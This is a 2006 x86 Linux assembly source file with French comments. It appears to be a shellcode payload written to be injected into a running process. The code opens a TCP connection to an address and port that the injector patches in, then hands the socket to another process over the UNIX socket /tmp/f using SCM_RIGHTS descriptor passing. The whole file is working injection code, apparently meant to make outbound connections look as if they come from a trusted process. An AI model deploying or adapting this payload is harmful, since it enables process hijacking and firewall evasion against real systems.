;; -*- asm -*- ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; ;; Copyright (C) 2006 Nicolas Bareil nicolas.bareil @ eads.net ;; ;; nbareil @ mouarf.org ;; ;; ;; ;; This program is free software; you can redistribute it and/or modify it ;; ;; under the terms of the GNU General Public License version 2 as ;; ;; published by the Free Software Foundation; version 2. ;; ;; ;; ;; This program is distributed in the hope that it will be useful, but ;; ;; WITHOUT ANY WARRANTY; without even the implied warranty of ;; ;; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ;; ;; General Public License for more details. ;; ;; ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; BITS 32 GLOBAL _start SECTION .text _start: nop nop push ebp mov ebp,esp pusha sub ebp,300 mov eax, 102 ; sys_socketcall mov ebx, 1 ; SYS_SOCKET mov ecx, ebp ; ptr to arguments mov word [ebp], 2 ; AF_INET mov word [ebp+4], 1 ; SOCK_STREAM mov dword [ebp+8], 6 ; tcp int 0x80 ; socket(PF_INET, SOCK_STREAM, TCP) mov edx, eax push eax ; notre fd mov eax, 102 ; sys_socketcall mov ebx, 3 ; SYS_CONNECT mov ecx, ebp mov dword [ebp], edx ; sockfd mov edx, ebp add edx, 12 mov dword [ebp+4], edx ; ptr to a sockaddr_in structure ;; struct sockaddr_in { ;; unsigned short sin_family; /* Address family */ ;; unsigned short int sin_port; /* Port number */ ;; __u32 sin_addr; /* Internet address */ ;; ;; /* Pad to size of `struct sockaddr'. */ ;; unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) - ;; sizeof(unsigned short int) - sizeof(struct in_addr)]; ;; }; mov word [ebp+12], 2 ; PF_INET mov word [ebp+14], 0x00000000 ; port (XXX: l'injecteur doit modifier ce mot) mov dword [ebp+16], 0x00000000 ; adresse (XXX: l'injecteur doit modifier ce mot) mov dword [ebp+8], 16 int 0x80 ; connect(fd, &sockaddr_in, sizeof(struct sockaddr_in) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;; ;; ;; on a créé et connecté la socket TCP, il faut maintenant la transférer ;; ;; au processus à l'aide d'une socket UNIX ;; ;; ;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; mov eax, 102 ; sys_socketcall mov ebx, 1 ; SYS_SOCKET mov ecx, ebp ; ptr to arguments mov dword [ebp], 1 ; AF_UNIX mov dword [ebp+4], 1 ; SOCK_STREAM mov dword [ebp+8], 0 ; int 0x80 ; socket(PF_UNIX, SOCK_STREAM, 0); push eax ; fd UNIX mov edx, eax connectunix: mov eax, 102 ; sys_socketcall mov ebx, 3 ; SYS_CONNECT mov ecx, ebp ; ptr mov dword [ebp], edx ; unixfd mov edx, ebp add edx, 14 mov dword [ebp+4], edx ; ptr to connect argument mov dword [ebp+8], 16 ; sizeof(struct sockaddr_un) mov word [edx], 1 ; AF_UNIX mov dword [edx+2], 0x706d742f ; /tmp XXX: goret mov dword [edx+6], 0x0000662f ; /f int 0x80 ; connect(4, {sa_family=AF_FILE, path="/tmp/f"}, 16) ;; structure msghdr ;; struct msghdr { ;; void * msg_name; /* Socket name */ ;; int msg_namelen; /* Length of name */ ;; struct iovec * msg_iov; /* Data blocks */ ;; __kernel_size_t msg_iovlen; /* Number of blocks */ ;; void * msg_control; /* Per protocol magic (eg BSD file descriptor passing) */ ;; __kernel_size_t msg_controllen; /* Length of cmsg list */ ;; unsigned msg_flags; ;; }; ;; struct cmsghdr { ;; __kernel_size_t cmsg_len; /* data byte count, including hdr */ ;; int cmsg_level; /* originating protocol */ ;; int cmsg_type; /* protocol-specific type */ ;; }; ;; struct iovec mov dword [ ebp ], 0 ; char tmp = 0 mov dword [ebp+1], ebp ; iov.iov_base = &tmp mov dword [ebp+5], 1 ; iov.iov_len = sizeof(tmp) = 1 mov edi, ebp add edi, 9 msghdr: ;; struct msghdr mov edx, 0 zeroify: cmp edx, 28 ; if (i < sizeof(msghdr) jg fin mov dword [edi+edx], 0 add edx, 4 jmp zeroify fin: mov edx, ebp ; inc edx ; pour sauter char tmp mov dword [edi+8], edx ; msg.msg_iov = &iov mov dword [edi+12], 1 ; msg.msg_iovlen = 1 mov esi, ebp add esi, 100 ; XXX mov dword [edi+16], esi ; msg.msg_control = &ancillary; ;mov dword [edi+16], 0xAAAAAAAA ; msg.msg_control = &ancillary; mov dword [edi+20], 16 ; msg.msg_controllen = sizeof(ancillary); ;; now, there is the cmsghdr at %esi mov dword [esi], 16 ; ch->cmsg_len = CMSG_LEN(sizeof(fd)) mov dword [esi+4], 1 ; ch->cmsg_level = SOL_SOCKET; mov dword [esi+8], 1 ; ch->cmsg_type = SCM_RIGHTS; depoppage: pop ebx ; contains the unix file descriptor pop eax ; contains the file descriptor to send mov dword [esi+12], eax ; *(int *) CMSG_DATA(ch) = fd; ptr_arg_sendmsg: mov ecx, ebp add ecx, 200 ; XXX mov dword [ecx], ebx ; unix file descriptor mov edi, ebp add edi, 9 mov dword [ecx+4], edi ; &msg mov dword [ecx+8], 0 ; options sendmsg: mov eax, 102 mov ebx, 16 ; SYS_SENDMSG mov edx, 12 ; len=3*4 int 0x80 ; sendmsg(sockfd, &msg, 0) add ebp, 300 popa mov esp,ebp pop ebp ret